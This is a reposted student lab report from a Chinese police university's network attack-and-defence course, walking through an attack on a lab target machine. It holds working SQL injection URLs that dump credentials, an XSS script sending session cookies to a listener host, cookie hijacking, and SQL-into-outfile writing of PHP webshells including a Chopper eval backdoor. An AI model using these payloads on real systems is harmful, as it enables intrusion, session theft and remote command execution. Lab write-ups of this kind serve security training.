实验报告五

 

 

 

 

 

 

中国人民公安大学

Chinese people public security university

 

网络对抗技术

实验报告

 

实验五

                   web攻击靶机解题过程

 

 

 

学生姓名

栗克宇 

年级

15 

区队

 三

指导教师

 

            高见

首先搭建虚拟机,扫描下当前网段 发现一个192.168.188.131的IP地址

 

 

打开该虚拟机提供的网页 使用发现可能存在sql注入点

http://192.168.188.131/cat.php?id=1

 

 

 

 

使用联合查询 查看网页的显示位

 http://192.168.188.131/cat.php?id=-2%20union%20select%201,2,3,4

 

 

 

 发现2是回显位,发现数据库的名字为photoblog

 

 http://192.168.188.131/cat.php?id=-2%20union%20select%201,group_concat(table_name),3,4%20from%20information_schema.tables%20where%20table_schema=%27photoblog%27

顺势查到数据库中的表,可见users表对我们有用

 

 

继续查询users表中列名,有变量名 id,login,password

http://192.168.188.131/cat.php?id=-2%20union%20select%201,group_concat(column_name),3,4%20from%20information_schema.columns%20where%20table_name=%27users%27

http://192.168.188.131/cat.php?id=-1%20union%20select%201,group_concat(id,0x23,login,0x23,password),3,4%20from%20users

 查看users表中的数据   

1#admin#8efe310f9ab3efeae8d410a8e0166eb2

 

 

MD5解密后,得到密码P4ssw0rd

 

 

 

 

在192.168.31.148机器上打开网页:

 

 

是个博客系统。

每个博客标题下面可以评价:

 

测试下是否存在xss漏洞。

发现提交后有弹出框:

进一步构造内容

<script>document.write('<img src="http://192.168.179.142/?'+document.cookie+'  "/>');</script>
同时在192.168.179.142机器上用nc打开80端口。

在原来机器上登陆admin账户,密码是p4ssw0rd

登陆进去后查看刚才发布的评论话题。

接着在142这台机器查看nc的返回内容。

获取到cookie信息。

复制下cookie,在142机器上打开评论所在的网页。并修改cookie的值为刚才复制的值。

刷新下页面,发现已经已admin的身份登录进页面中

进入管理界面后,发现博客编辑界面存在sql注入漏洞。

 

http://192.168.179.133/admin/edit.php ?id=4 union select 1,2,3,4

发现2和3可以显示出来

http://192.168.179.133/admin/edit.php ?id=0 union select 1,2,load_file("/etc/passwd"),4

可以读取passwd文件,但是不能读取shadow文件

在编辑页面发现错误提示中有/var/www/classes 目录,

 在查看源码时发现有css目录

 

尝试后发现/var/www/css 目录可写。

于是构造语句:

http://192.168.179.130/admin/edit.php?id=2%20union%20select%201,2,3,4%20into%20outfile%20%22/var/www/css/s.php%22

然后打开

http://192.168.179.130/css/s.php

显示:

说明s.php文件成功写入到/var/www/css 目录,下面将

<?php system($_GET['c']); ?>

写入z.php中,构造url为:

http://192.168.179.130/admin/edit.php?id=2%20union%20select%201,2,%22%3C?php%20system($_GET[%27c%27]);%20?%3E%22,4%20into%20outfile%20%22/var/www/css/z.php%22

访问z.php,并使用uname -a获取系统信息。可以远程执行命令。

 

 

下面写入一句话木马,构造url:

http://192.168.179.130/admin/edit.php?id=2%20union%20select%201,2,%22%3C?php%20@eval($_POST[%27chopper%27]);?%3E%22,4%20into%20outfile%20%22/var/www/css/dao.php%22

菜刀链接:

 

转载于:https://www.cnblogs.com/p201521430047/p/8944406.html

评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值